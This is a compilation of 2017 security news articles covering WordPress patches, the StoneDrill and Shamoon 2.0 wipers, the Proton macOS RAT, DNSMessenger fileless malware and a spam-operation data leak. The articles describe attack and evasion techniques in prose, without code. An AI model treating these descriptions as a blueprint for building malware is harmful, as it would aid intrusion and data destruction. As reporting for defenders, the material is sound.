WordPress has issued a new security release, the WordPress 4.7.3 release, that addresses six security flaws, including three cross-site scripting (XSS) vulnerabilities. The flaws were discovered by the security experts Chris Andrè Dale, Yorick Koster, Simon P. Briggs, Marc Montpas and a user that goes online with the moniker “Delta.”
The XSS vulnerabilities can be exploited via media file metadata, video URLs in YouTube embeds, and taxonomy term names.
WordPress 4.7.3
Below the list of vulnerabilities addressed by the WordPress 4.7.3 release:
Cross-site scripting (XSS) via media file metadata. Reported by Chris Andrè Dale, Yorick Koster, and Simon P. Briggs.
Control characters can trick redirect URL validation. Reported by Daniel Chatfield.
Unintended files can be deleted by administrators using the plugin deletion functionality. Reported by xuliang.
Cross-site scripting (XSS) via video URL in YouTube embeds. Reported by Marc Montpas.
Cross-site scripting (XSS) via taxonomy term names. Reported by Delta.
Cross-site request forgery (CSRF) in Press This leading to excessive use of server resources. Reported by Sipke Mellema.
It is interesting to note that both CSRF and XSS flaws were discovered in July 2016 during the Summer of Pwnage competition organized by the security firm Securify. The researchers released proof-of-concept (PoC) code to exploit both issues.
According to Koster, who spotted the vulnerabilities in the playlist functionality, the attacker needs to convince an editor or administrator into uploading an MP3 file containing specially crafted metadata. Using this trick the attacker’s malicious code attacker’s code will be executed when the metadata is processed by the renderTracks() or wp_playlist_shortcode() functions.
However, there is a CSRF vulnerability in WordPress that still has not been patched, the flaw was discovered in July 2016 and the details for the exploitation were not disclosed.
The flaw could be exploited by an attacker to steal FTP and SSH login credentials.
The security expert Cengiz Han Sahin explained this vulnerability may have a high impact, but the probability of exploitation is low.
StoneDrill Disk Wiping Malware Found Targeting European Industries
7.3.2017 thehackernews Virus
A new disk wiping malware has been uncovered targeting a petroleum company in Europe, which is quite similar to the mysterious disk wiper malware Shamoon that wiped data from 35,000 computers at Saudi Arabia's national oil company in 2012.
Disk wiping malware has the ability to cripple any organization by permanently wiping out data from all hard drive and external storage on a targeted machine, causing great financial and reputational damage.
Security researchers from Moscow-based antivirus provider Kaspersky Lab discovered the new wiper StoneDrill while researching last November's re-emergence of Shamoon malware (Shamoon 2.0) attacks – two attacks occurred in November and one in late January.
Shamoon 2.0 is the more advanced version of Shamoon malware that reportedly hit 15 government agencies and organizations across the world, wipes data and takes control of the computer’s boot record, preventing the computers from being turned back on.
Meanwhile, Kaspersky researchers found that the newly discovered StoneDrill wiper malware was built in a similar "style" to Shamoon 2.0, but did not share the exact same code base.
"The discovery of the StoneDrill wiper in Europe is a significant sign that the group is expanding its destructive attacks outside the Middle East," Kaspersky researchers say in a blog post. "The target for the attack appears to be a large corporation with a wide area of activity in the petrochemical sector, with no apparent connection or interest in Saudi Arabia."
Researchers also noticed that the samples of Shamoon 2.0 and StoneDrill were also uploaded multiple times to online multi-scanner antivirus engines from Saudi Arabia last November.
Here's How StoneDrill Malware Works:
stonedrill-data-wiping-malware
StoneDrill has been designed to as a service and target all systems connected within an organization to a Windows domain. In order to spread itself, the malware relies on a list of hard coded, previously stolen usernames and passwords belonging to administrators of the targeted domain.
Once infected, StoneDrill automatically generates a custom wiper malware module without connecting to any command-and-control server, rendering the infected machines completely inoperable.
StoneDrill wiper malware also includes the following characteristics:
New Evasion Techniques
StoneDrill features an impressive ability to evade detection and avoid sandbox execution. Unlike Shamoon, StoneDrill doesn't make use of disk drivers during installation.
Instead, StoneDrill relies on memory injection of the data wiping module into the victim's preferred browser.
StoneDrill also makes use of Visual Basic Scripts to run self-delete scripts, while Shamoon did not use any external scripts.
Backdoor Ability
Like Shamoon, StoneDrill also includes backdoor functions that are used for espionage operations, with screenshot and upload capabilities.
Kaspersky researchers identified at least four command-and-control (C&C) servers that the attackers used to spy on and steal data from an unknown number of targets.
Furthermore, StoneDrill uses command and control communications to interact with the malware instead of using a "kill time" as in the Shamoon attacks analyzed in January 2017 that do not implement any C&C communication.
Ransomware Component
Besides wiping functionality, the new malware also includes a ransomware component.
However, this feature is currently inactive but attackers can use leverage this part of the platform in future attacks to hold victims hostage for financial or idealistic gain.
Like Shamoon 2.0, StoneDrill was reportedly compiled in October and November 2016.
Although StoneDrill mostly targets organizations in Saudi Arabia, Kaspersky researchers discovered the malware victims in Europe as well, meaning that the attackers might be widening their campaign.
For more technical details about the StoneDrill and Shamoon 2.0 attacks, you can head on to Kaspersky's official blog.
macOS RAT Uses 0-Day for Root Access
7.3.2017 securityweek Virus
A new remote access tool (RAT) targeting macOS and believed to be using an unpatched 0-day vulnerability to gain root access on target machines, is currently being advertised on underground markets.
Dubbed Proton, the RAT was found on a closed Russian cybercrime message board, being offered by its author “in one of the leading underground cybercrime markets,” Sixgill researchers report. The Trojan is currently offered at 2 Bitcoins (around $2,500) for single installations, but an unlimited installations option is also available, at 40 Bitcoin.
According to the author, the tool was written in native Objective C and is fully undetectable by existing anti-virus programs for macOS. Objective C, the security researchers say, offers the great advantage that the malware doesn’t require dependencies.
Advertised as “a professional FUD surveillance and control solution” and packing root-access privileges and features, the tool allows an attacker to take full control of the victim’s machine. The malware can execute any bash command under root, monitor keystrokes, upload/download files to/from the victim’s machine, grab screenshots or webcam captures, get updates, and also send notifications to the attacker.
The Trojan also enables the attacker to connect via SSH/VNC to the target machine, and can even present a custom native window requesting information such as a credit-card, driver’s license and more. Further, the tool also packs iCloud access capability, even when two-factor authentication is enabled.
The malware can deliver these features because it “is shipped with genuine Apple code-signing signatures,” Sixgill researchers explain. The author might have tricked Apple’s filtration process for third-party software developers, either by registering to Apple’s developer program under a false ID, or by leveraging stolen developer credentials, which allowed them to get the necessary certificates.
Of higher concern would be the use of a previously unpatched 0-day vulnerability to gain root access. If such a vulnerability indeed exists and Proton’s author is in its possession, others might be aware of it and even exploit it as well.
For distribution, Proton’s operators would simply need to masquerade the Trojan as a genuine application, with a custom icon and name, and then trick the victim into downloading and installing it.
The RAT is being sold through a dedicated website that also includes some promotional material related to the malware, along with a login system, the researchers say. Proton’s author advertises the tool under the premise of legitimate use, and even uploaded a short video demonstrating the installation process to YouTube.
Six Flaws Patched With Release of WordPress 4.7.3
7.3.2017 securityweek Vulnerebility
WordPress developers announced on Monday the availability of version 4.7.3, a security release that includes patches for six vulnerabilities and 39 maintenance fixes.
WordPress 4.7.3 addresses three cross-site scripting (XSS) flaws that can be exploited via media file metadata, video URLs in YouTube embeds, and taxonomy term names. Chris Andrè Dale, Yorick Koster, Simon P. Briggs, Sucuri researcher Marc Montpas, and a user with the moniker “Delta” have been credited for finding these security holes.
The latest WordPress update also fixes a vulnerability that allows control characters to trick redirect URL validation (reported by Daniel Chatfield), and a bug that can lead to administrators deleting unintended files via the plugin deletion functionality (reported by xuliang).
Another vulnerability patched on Monday, identified by Sipke Mellema, is a cross-site request forgery (CSRF) in the “Press This” function. Exploitation of this flaw can lead to excessive use of server resources and a denial-of-service (DoS) condition.
Mellema and Koster identified the CSRF and XSS vulnerabilities in July 2016 as part of the Summer of Pwnage competition organized by Dutch security firm Securify. The details of the security holes and proof-of-concept (PoC) code have been made public on the Summer of Pwnage website.
According to Koster, he identified two XSS flaws in WordPress’ playlist functionality. An attacker needs to convince an editor or administrator into uploading an MP3 file containing specially crafted metadata. The attacker’s code will get executed when the metadata is processed by the renderTracks() or wp_playlist_shortcode() methods.
Over 100 vulnerabilities have been found in the WordPress core and plugins as part of the Summer of Pwnage project, and most of the issues have been disclosed on March 1, regardless of whether or not they have been fixed.
One WordPress core vulnerability that still has not been patched is a CSRF found by Koster in July 2016. The details of the flaw have not been disclosed, but Cengiz Han Sahin, co-founder of Securify, told SecurityWeek that the unpatched flaw could, in theory, allow an attacker to steal FTP and SSH login credentials. The expert said the vulnerability can have a high impact, but the probability of exploitation is low.
While the developers of the content management system (CMS) claim WordPress 4.7.3 patches six vulnerabilities, there could be other issues they have not disclosed in an effort to protect users. When WordPress 4.7.2 was released on January 26, it appeared to patch only three vulnerabilities, but in reality it also resolved a critical privilege escalation and content injection issue that was disclosed only one week later.
This critical flaw has been exploited in defacements carried out by script kiddies and attacks whose goal was to gain full control of a website.
Ransomware Module Found in Shamoon 2.0
7.3.2017 securityweek Virus
The Shamoon 2.0 malware used recently in attacks aimed at the Middle East has a fully functional ransomware module that can encrypt files on the infected device, Kaspersky Lab said on Monday.
The security firm has published a report detailing Shamoon 2.0 and a new piece of malware, dubbed “StoneDrill,” that has been connected to both Shamoon and the Iran-linked threat actor Charming Kitten, aka NewsBeef and Newscaster.
One of the most interesting pieces of information shared by the company about Shamoon 2.0 is that, in addition to its well-known wiper functionality, it includes a ransomware module. The ransomware functionality is currently inactive, but experts believe it could be leveraged in future Shamoon attacks.
Once it infects a machine, Shamoon checks the system time to determine when to drop the main payload, which allows the attackers to either wipe or encrypt files and partitions.
“In the ‘encryption/ransomware’ mode, a weak pseudo - random RC4 key is generated, which is further encrypted by the RSA public key and stored directly on the hard drive (at <\Device\Harddisk0\Partition0>) starting at offset 0x201, right after the master boot record,” Kaspersky said in its report.
The ransomware module can be used to encrypt Shamoon components, files stored in Windows folders (e.g. Desktop, Downloads, Documents, Pictures), NTFS master file table (MFT) data from all drives except the system drive, files in Windows system folders, and part of the FirmwareBootDevice partition.
Shamoon is not the only wiper whose authors have recently decided to add ransomware functionality to their creation. Late last year, researchers reported that a variant of the KillDisk malware, which had been involved in the attacks on Ukraine’s energy sector, had been designed to encrypt files and hold them for ransom instead of deleting them.
Kaspersky Lab also revealed that the resources used by Shamoon appear to have a Yemeni Arabic language ID. While this could indicate that the threat group behind Shamoon is located in Yemen, which would also have a good reason to target Saudi Arabia, it’s also possible that this is a false flag. Previously, researchers attributed the Shamoon attacks to Iran.
CA Technologies to Acquire Veracode for $614 Million
7.3.2017 securityweek IT
Enterprise software firm CA Technologies (NASDAQ:CA) announced on Monday that it has signed a definitive agreement to acquire Veracode, a provider application security testing solutions, for roughly $614 in cash.
Burlington, Mass.-based Veracode offers a cloud-based application security testing service that helps companies secure web, mobile and third-party applications. Veracode’s platform offers centralized policies and KPIs which to help reduce risk and measure progress across business units and development teams, including third-party suppliers, outsourcers and open source developers.
Veracode Logo
The company has raised more than $134 million in funding, including a $40 million investment in late 2014.
“The combination of CA’s portfolio with privately-held Veracode will establish CA Technologies as a leader in the Secure DevOps market through the automation and scaling of application security testing (AST) to develop and deploy applications faster with fewer defects,” CA said in an announcement. “With Veracode, CA Technologies bridges its Security business with its broad DevOps portfolio and adds to its growing SaaS business.”
"This acquisition will unify CA’s Security and DevOps portfolios with a SaaS- based platform that seamlessly integrates security into the software development process. Looking holistically at our portfolio, now with Veracode and Automic, we have accelerated the growth profile of our broad set of solutions.”
“We provide over 1400 small and large enterprise customers the security they need to confidently innovate with the web and mobile applications they build, buy and assemble, as well as the components they integrate into their environments,” said Bob Brennan, CEO of Veracode. “By joining forces with CA Technologies, we will continue to better address growing security concerns, and enable them to accelerate delivery of secure software applications that can create new business value.”
The transaction is expected to close in the first quarter of fiscal year 2018.
Founded in 2006, Veracode has offices in Burlington, MA and London and has more than 500 employees globally.
The application security space has been hot, and the acquisition of Veracode follows other notable acquisitions in the space. In November 2016, Synopsys, a company that provides tools and services for designing chips and electronic systems, announced that it would acquire Cigital, a provider of software security testing solutions, along with Cigital spin-off Codiscope, which also provides security tools. Coverity, another application security provider, was also acquired by Synopsys for approximately $375 million in February 2014, while Cenzic was acquired by Trustwave in March 2014 for an undisclosed sum. Fortify, a pioneer in the software security space, was acquired by HP in 2010.
The 1.4 Billion records recently leaked come from the DB of the World’s Biggest Spam Networks
7.3.2017 securityaffairs Spam
A few days ago the experts Chris Vickery announced that he will reveal the source of a massive data leak. Now he said it is from world’s biggest spam networks.
A few days ago the popular cyber security expert Chris Vickery from security firm MacKeeper announced that he will shortly reveal the source of a huge data breach impacting individuals.
The huge archive contains 1.4 billion email addresses, names, physical addresses and IP addresses. For sure it will be one the largest data breach of 2017.
Vickery also offered a teaser of the leak, also reducing the number of identities by 30,000.
Follow
Chris Vickery @VickerySec
Teaser screenshot of that DB's summary data:
3:22 AM - 4 Mar 2017
59 59 Retweets 44 44 likes
Security experts made several hypotheses about the name of the alleged victim of the data breach, one of them was the Aadhaar, the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017.
The Unique Identification Authority of India (UIDAI) promtly denies their archive was the source of the leak.
The reality is quite different.
Vickery shared the data with the expert Steve Ragan from Salted Hash and discovered an unsecured repository of backup files linked to a notorious spamming organization called River City Media (RCM).
“This is the story of how River City Media (RCM), Alvin Slocombe, and Matt Ferris, accidentally exposed their entire operation to the public after failing to properly configure their Rsync backups.” reported Salted Hash.
“The data from this well-known, but slippery spamming operation, was discovered by Chris Vickery, a security researcher for MacKeeper and shared with Salted Hash, Spamhaus, as well as relevant law enforcement agencies.”
The huge archive includes sensitive information about the operations of the River City Media, a company that claims to be a legitimate marketing firm, but that is the source of billion spam messages per day.
Vickery didn’t reach out to RCM directly, he was not able to fully verify the huge data leak but he explained that the archive includes addresses he knew very well and that were accurate
“The situation presents a tangible threat to online privacy and security as it involves a database of 1.4bn email accounts combined with real names, user IP addresses, and often physical address,” Vickery said. “Chances are that you, or at least someone you know, is affected.”
What about the spamming business?
No doubts, spamming operations are very profitable.?
The leaked data shows that the RCM sent 18 million emails to Gmail users and 15 million to AOL users in a single day, and the company earned around $36,000. Not so 
River City Media spam operation 2
The River City Media company used many illegal hacking techniques to target send spam messages to as many users as possible.
One of these techniques is the Slowloris attack, a method that is used to paralyze a web server rather than subvert it in this manner.
“Purposely throttling your own machinery to amass open connections on someone else’s server is a type of Slowloris attack [https://en.wikipedia.org/wiki/Slowloris_(computer_security)]. The twist here is that the spammer is not trying to completely disable the receiving server, he is only temporarily stressing the resources in order to overwhelm and force the processing of bulk email.” Vickery explained in a blog post.
Vickery defined illegal the hacking activity of the RCM due to the presence of scripts and logs enumerating the groups’ many missions to probe and exploit vulnerable mail servers. The leaked backusp include chat log in which personnel at the company admit and describe the adoption of hacking methods.
“In that screenshot, a RCM co-conspirator describes a technique in which the spammer seeks to open as many connections as possible between themselves and a Gmail server. This is done by purposefully configuring your own machine to send response packets extremely slowly, and in a fragmented manner, while constantly requesting more connections.”
The expert has shared details of RSM’s operations with other parties, including Microsoft, Apple, Salted Hash, Spamhaus and of course law enforcement.
To block the activity of the group, Spamhaus announced the blacklisting of the entire infrastructure used by the RCM from its Register of Known Spam Operations (ROKSO) database. The service tracks professional spam campaigns.
Chris Vickery discovered many other clamorous cases of open database exposed on the Internet. In December 2015 the security expert discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.
In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.
In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.
FCC gives full powers to US ISPs, they can sell users’ data without consent
7.3.2017 securityaffairs Security
The United States Federal Communications Commission (FCC) announced the suspension of the privacy rules just before they came into effect.
Someone considers the privacy the modern utopia, it is daily threatened by law enforcement and intelligence agencies and authoritarian regimes.
Unfortunately, I have bad news for privacy defenders.
On October 2016, the United States Federal Communications Commission (FCC) passed a set of privacy rules on ISPs that limit them from using user data for marketing or commercial purposes. The rules prohibit ISPs from sharing user data with third parties without the user’s explicit consent. The set of rules also requires ISPs to implement “reasonable measures” to protect data from cyber threats.
Back to the present, the FCC announced the suspension of the privacy rules just before they came into effect.
“”Until that happens, however, we will work together on harmonizing the FCC’s privacy rules for broadband providers with the FTC’s standards for other companies in the digital economy. Accordingly, the FCC today stayed one of its rules before it could take effect on March 2.” reads a joint statement of FCC chairman Ajit Pai And Acting FTC chairman Maureen K. Ohlhausen on protecting Americans’ online privacy.
“This rule is not consistent with the FTC’s privacy framework. The stay will remain in place only until the FCC is able to rule on a petition for reconsideration of its privacy rules.”
This means that Internet Service Providers (ISPs) can use customers’ data for the commercial purposes.
Consider that ISPs are a sort of sentinel of the Internet, from their point of view it is possible to monitor users’ activities and profile them.
Data collected on the users then are shared with advertising firms for commercial purposes.
Ajit Pai is the Chairman of the Federal Communications Commission, he was designated Chairman by President Donald Trump in January 2017.
Ajit Pai is known as an opponent of the net neutrality, he publicly defined it “a mistake.”
Pai is arguing that the privacy rules favored IT tech giants like Google and Facebook, which are regulated by the Federal Trade Commission (FTC), over ISPs like Verizon and Comcast.
FCC
So, he is asking for the equity in the treatment for IT firms by the FTC and the FCC.
“All actors in the online space should be subject to the same rules, enforced by the same agency.” FCC said in a statement.
The FCC will block new privacy rules because it will never go in contrast with IT giants like Google and Facebook on the way they commercialize usersì data, it is likely the FCC would never restore those suspended rules on ISPs.
Kaspersky Lab discovered a new sophisticated Shamoon-Linked malware dubbed StoneDrill
7.3.2017 securityaffairs Virus
The experts spotted a new sophisticated strain of malware dubbed StoneDrill that is linked to Shamoon 2 and Charming Kitten.
Researchers at Kaspersky Lab have discovered further information about the dreaded Shamoon 2 malware. The experts spotted a new sophisticated strain of malware dubbed StoneDrill that is linked to Shamoon 2 and Charming Kitten (aka Newscaster and NewsBeef). StoneDrill can be used for both cyber espionage and sabotage, like Shamoon it wipes the infected computer.
The malware was used by threat actors against entities in Saudi Arabia and at least one organization in Europe.
“While investigating the Shamoon 2.0 attacks, Kaspersky Lab also discovered a previously unknown wiper malware which appears to be targeting organizations in Saudi Arabia. We’re calling this new wiper StoneDrill. StoneDrill has several “style” similarities to Shamoon, with multiple interesting factors and techniques to allow for the better evasion of detection.” reads the analysis shared by Kaspersky Lab. “In addition to suspected Saudi targets, one victim of StoneDrill was observed on the Kaspersky Security Network (KSN) in Europe. This makes us believe the threat actor behind StoneDrill is expanding its wiping operations from the Middle East to Europe.”
At the time the report was published by Kaspersky, there are no reports of StoneDrill attacks that caused damage.
The discovery of the new threat was causal, researchers were using a set of Yara rules developed to identify the Shamoon malware.
Even if StoneDrill and Shamoon don’t share portions of code, the experts discovered many similarities between malware styles and malware components in Shamoon, StoneDrill, and NewsBeef.
The researchers are still investigating the infection process, they confirmed that StoneDrill implements sophisticated techniques to evade security applications.
While Shamoon uses drivers during deployment, StoneDrill implements memory injection mechanisms of the wiping module into the victim’s browser.
The wiper feature has been implemented using a new technique.
The wiper is able to target both physical and logical drives and reboots the system once the wipe process is completed.
“Depending on the configuration, this module wipes with random data one of following possible targets:
All accessible physical drives by using the device path “\\.\PhysicalDrive”
All accessible logical drives by using device path “\\.\X:”
Recursively wipes and deletes files in all folders except “Windows” on all accessible logical drives
Places a special emphasis on wiping files named “asdhgasdasdwqe%digits%” in the root folder of the disk.
The researchers at Kaspersky have detected a StoneDrill sample that was specifically designed to establish a backdoor on the infected system. The sample was likely developed for espionage purposes.
The experts identified four C&C servers used in cyber espionage activities, this means that StoneDrill uses C&C communications to receive instructions from attackers.
Researchers discovered that StoneDrill has many similarities (code, C&C naming conventions, backdoor commands and functionality, and Winmain signatures) to a strain of malware used by Charming Kitten.
For this reason, it is considered an evolution of the Charming Kitten malware.
Is there the same threat behind StoneDrill and Shamoon threats?
According to the experts from Kaspersky, there are two separate groups behind the threat that anyway share the same objectives.
“While Shamoon embeds Arabic-Yemen resource language sections, StoneDrill embeds mostly Persian resource language sections. Of course, we do not exclude the possibility of false flags.” reads the report.
The last variant of the Shamoon malware that targeted organizations in Saudi Arabia also includes a newly discovered ransomware component.
According to the experts, the ransomware component of Shamoon 2 has yet to be used in the wild.
“Despite the widespread coverage of the resurgence of the Shamoon wiper, few have noted the new ransomware functionality. The wiper module of Shamoon 2.0 has been designed to run as either a wiper or an encryptor (ransomware). ” reads the Kaspersky’s analysis. “In the “encryption/ransomware” mode, a weak pseudo-random RC4 key is generated, which is further encrypted by the RSA public key and stored directly on the hard drive (at <\Device\Harddisk0\Partition0>) starting at offset 0x201, right after the master boot record”
Podle nejnovější zprávy zaznamenal ransomware 752procentní nárůst
7.3.2017 SecurityWorld Viry
Trend Micro vydalo svoji nejnovější výroční bezpečnostní zprávu 2016 Security Roundup: A Record Year for Enterprise Threats, která potvrzuje, že rok 2016 byl rokem online vydírání. Kybernetické hrozby dosáhly loni svého historického maxima, zejména pak díky rostoucí oblibě ransomwaru i útoků využívajících firemní emaily (Business Email Compromise, BEC).
Nárůst nových rodin ransomwaru o 752 procent způsobil firmám po celém světě ztrátu ve výši 1 miliardy amerických dolarů. Společnost Trend Micro spolu s iniciativou Zero Day Initiative (ZDI) odhalily v průběhu roku 2016 celkem 765 zranitelností. Hned 678 z nich bylo zjištěno prostřednictvím bug bounty programu iniciativy ZDI – takto odhalená rizika ZDI prověřuje a následně o nich informuje příslušné výrobce.
Ve srovnání s rokem 2015 zaznamenala nárůst z pohledu zranitelností objevených společností Trend Micro a iniciativy ZDI značka Apple (145 procent), zatímco Microsoft se může pochlubit o 47 procent nižším počtem potenciálně nebezpečných chyb. Navíc došlo i k poklesu využívání nově objevených zranitelností v exploit kitech, a to o 71 procent. Částečně to bylo způsobené zatčením osob stojících za kitem Angler v červnu 2016.
„Spolu s tím, jak se hrozby diverzifikují a jsou stále sofistikovanější, přesunul se zájem kybernetických zločinců od jednotlivců tam, kde jsou peníze – tedy k podnikům,“ řekl Ed Cabrera, ředitel počítačové bezpečnosti společnosti Trend Micro. „Po celý rok 2016 jsme byli svědky vydírání firem i organizací za účelem zisku a neočekáváme, že by došlo ke zpomalení tohoto trendu. Náš průzkum si klade za cíl poskytnout podnikům informace o taktikách, které útočníci aktivně používají ke kompromitaci jejich dat, a také jim pomoci přijmout opatření umožňující zůstat krok před kybernetickými zločinci a chránit se před potenciálními útoky.“
Globální služba společnosti Trend Micro – Smart Protection Network – zablokovala během celého roku 2016 více než 81 miliard hrozeb, tedy ve srovnání s rokem 2015 o celých 56 procent více. Ve druhé polovině roku 2016 přitom bylo blokováno více než 3 000 útoků za sekundu. Během celého loňského roku bylo hned 75 miliard zablokovaných pokusů založeno na elektronické poště a takto vysoká čísla potvrzují, že emaily zůstávají pro počítačové zločince hlavní vstupní branou do infrastruktury nebo počítače oběti.
Česká republika se na celkovém počtu hrozeb podílela pouhými 0,17 procenty a vůči regionu EMEA pak 0,70 procenty. Obě hodnoty jsou horší například ve srovnání se Slovenskem (0,06 % a 0,23 %) a lepší například vůči Polsku (1,02 % a 4,08 %). Nejrozšířenějším detekovaným malwarem v České republice byl v roce 2016 Nemucod a například nejčastěji blokovanou doménou militarismreptilesoapsud.com.
Mezi hlavní zjištění pro rok 2016 patří:
Růst ransomwaru – v průběhu 12 měsíců se počet rodin ransomwaru zvýšil z 29 na 247. Jednou z hlavních příčin vysokého růstu je ziskovost tohoto typu hrozby. Ačkoli jednotlivci i organizace jsou před placením výkupného varováni, počítačoví zločinci si i tak jen za loňský rok přišli přibližně na 1 miliardu dolarů.
Vzestup útoků a podvodů prostřednictvím firemních emailů (BEC) – stejně jako v případě ransomwaru se ukázalo, že počítačové zločiny založené na hrozbách typu BEC jsou neuvěřitelně lukrativní záležitostí. Následkem vysoké obliby přišly firmy po celém světě v průměru o 14 000 dolarů. Tento typ hrozeb je navíc důkazem efektivity technik založených na sociálním inženýrství v případě útoků cílených na podnikovou sféru.
Různorodost zranitelností – Trend Micro spolu s iniciativou Zero Day Initiative objevily v roce 2016 rekordní počet zranitelností, z nichž byla většina nalezena v Adobe Acrobat Reader DC a v nástroji WebAccess společnosti Advantech. Obě aplikace jsou široce využívány v podnikových informačních architekturách a systémech SCADA (Supervisory Control and Data Acquisition).
Ústup exploit kitu ze slávy – po zatčení 50 počítačových zločinců se dříve dominantní exploit kit Angler pomalu vytrácí. A přestože netrvalo příliš dlouho a uvolněné místo začaly zaplňovat nové exploit kity, počet zranitelností obsažených v exploit kitech klesl do konce roku 2016 o 71 procent.
Bankovní trojské koně a malware zaměřený na bankomaty – počítačoví zločinci využívají ATM malware, kopírování informací z platebních karet i bankovní trojské koně. Nicméně útoky se během posledních let diversifikují, útočníci získávají osobní identifikační a přístupové údaje využitelné i v rámci průniků do firemních sítí.
Masivní útoky využívající malware Mirai – v říjnu 2016 využili útočníci špatného zabezpečení zařízení ze světa internetu věcí a pomocí přibližně 100 000 těchto zařízení provedli distribuovaný DoS útok (Distributed Denial-of-Service, DDoS) na vybrané služby, jako je Twitter, Reddit nebo Spotify, které tak byly několik hodin nedostupné.
Historický únik dat v Yahoo – v případě společnosti Yahoo sice došlo k historicky největšímu úniku dat, který se týkal jedné miliardy uživatelských účtů, již v srpnu 2013, nicméně incident byl zveřejněný až tři měsíce po dalším úniku v září 2016 týkajícím se 500 miliónů účtů. Tyto události vzbudily diskuzi o zveřejňování informací a odpovědnosti, kterou společnosti mají ke svým zákazníkům z pohledu bezpečnosti uživatelských dat.
Database of 1.4 Billion Records leaked from World’s Biggest Spam Networks
6.3.2017 thehackernews Spam
A database of 1.4 billion email addresses combined with real names, IP addresses, and often physical address has been exposed in what appears to be one the largest data breach of this year.
What's worrisome? There are high chances that you, or at least someone you know, is affected by this latest data breach.
Security researcher Chris Vickery of MacKeeper and Steve Ragan of CSOOnline discovered an unsecured and publicly exposed repository of network-available backup files linked to a notorious spamming organization called River City Media (RCM), led by notorious spammers Matt Ferrisi and Alvin Slocombe.
Spammer’s Entire Operation Exposed
The database contains sensitive information about the company's operations, including nearly 1.4 Billion user records, which was left completely exposed to anyone – even without any username or password.
According to MacKeeper security researcher Vickery, RCM, which claims to be a legitimate marketing firm, is responsible for sending around a billion unwanted messages per day.
Besides exposing more than a billion email addresses, real names, IP addresses and, in some cases, physical addresses, the leak exposed many documents that revealed the inner workings of RCM's spam operation.
"The situation presents a tangible threat to online privacy and security as it involves a database of 1.4bn email accounts combined with real names, user IP addresses, and often physical address," Vickery said. "Chances are that you, or at least someone you know, is affected."
Vickery wasn't able to fully verify the leak but said he discovered addresses he knew were accurate in the database.
Wondering how spamming operations can be profitable? One leaked text shows a single day of activity of RCM that sent 18 million emails to Gmail users and 15 million to AOL users, and the total take of the spamming company was around $36,000.
Illegal Hacking Techniques Used by RCM
The company employed many illegal hacking techniques to target as many users as possible. One of the primary hacking methods described by the researchers is the Slowloris attacks, a method designed to cripple a web server rather than subvert it in this manner.
"[Slowloris is] a technique in which the spammer seeks to open as many connections as possible between themselves and a Gmail server," Vickery writes in a blog post published today.
"This is done by purposefully configuring your own machine to send response packets extremely slowly, and in a fragmented manner, while constantly requesting more connections."
The researchers have reported that details of RSM’s operations and its abusive scripts and techniques have been sent to Microsoft, Apple, Salted Hash, Spamhaus, and others affected parties.
Meanwhile, the researchers have also notified law enforcement agencies, which they says, have expressed keen interest in the matter.
In response to the latest discovery, Spamhaus will be blacklisting RCM’s entire infrastructure from its Register of Known Spam Operations (ROKSO) database that tracks professional spam operations and lists them using a three-strike rule.
New Fileless Malware Uses DNS Queries To Receive PowerShell Commands
6.3.2017 thehackernews Virus
It is no secret that cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day.
While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that involve the exploitation of standard system tools and protocols, which are not always monitored.
The latest example of such attack is DNSMessenger – a new Remote Access Trojan (RAT) that uses DNS queries to conduct malicious PowerShell commands on compromised computers – a technique that makes the RAT difficult to detect onto targeted systems.
The Trojan came to the attention of Cisco's Talos threat research group by a security researcher named Simpo, who highlighted a tweet that encoded text in a PowerShell script that said 'SourceFireSux.' SourceFire is one of Cisco's corporate security products.
DNSMessenger Attack Is Completely Fileless
Further analysis of the malware ultimately led Talos researchers to discover a sophisticated attack comprising a malicious Word document and a PowerShell backdoor communicating with its command-and-control servers via DNS requests.
Distributed through an email phishing campaign, the DNSMessenger attack is completely Fileless, as it does not involve writing files to the targeted system; instead, it uses DNS TXT messaging capabilities to fetch malicious PowerShell commands stored remotely as DNS TXT records.
This feature makes it invisible to standard anti-malware defenses.
PowerShell is a powerful scripting language built into Windows that allows for the automation of system administration tasks.
The malicious Word document has been crafted "to appear as if it were associated with a secure e-mail service that is secured by McAfee," according to a blog post published by Talos researchers Edmund Brumaghin and Colin Grady on Thursday.
Here's How the DNSMessenger attack Works:
When opened, the document launches a Visual Basic for Applications (VBA) macro to execute a self-contained PowerShell script in an attempt to run the backdoor onto the target system.
What's interesting? Everything, until this point, is done in memory, without writing any malicious files to the system's disk.
Next, the VBA script unpacks a compressed and sophisticated second stage of PowerShell, which involves checking for several parameters of the target environment, like the privileges of the logged-in user and the version of PowerShell installed on the target system.
This information is then used to ensure persistence on the infected host by changing the Windows Registry and installing a third stage PowerShell script that contains a simple backdoor.
The backdoor is being added to the Windows Management Instrumentation (WMI) database, if the victim does have administrative access, allowing the malware backdoor to stay persistent on the system even after a reboot.
The backdoor is an additional script that establishes a sophisticated 2-way communications channel over the Domain Name System (DNS) – usually used to look up the IP addresses associated with domain names, but has support for different types of records.
The DNSMessenger malware backdoor uses DNS TXT records that, by definition, allows a DNS server to attach unformatted text to a response.
The backdoor periodically sends DNS queries to one of a series of domains hard-coded in its source code. As part of those requests, it retrieves the domain's DNS TXT record, which contains further PowerShell commands that are executed but never written to the local system.
Now, this "fourth stage" Powershell script is the actual remote control tool used by the malware attacker.
This script queries the command-and-control servers via DNS TXT message requests to ask what commands to execute. Any command received is then executed, and the output is communicated back to the C&C server, allowing the attacker to execute any Windows or application commands on the infected system.
All attackers need to do is leave malicious commands and instructions inside the TXT records of their domains, which, when queried, is executed via the Windows Command Line Processor, and the output is sent back as another DNS query.
The domains registered by the DNSMessenger RAT are all down, so till now, it is not known that what types of commands the attackers relayed to infected systems. However, the researchers say this particular RAT was used in a small number of targeted attacks.
"This malware sample is an excellent example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting," the Talos researchers said.
"It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure."
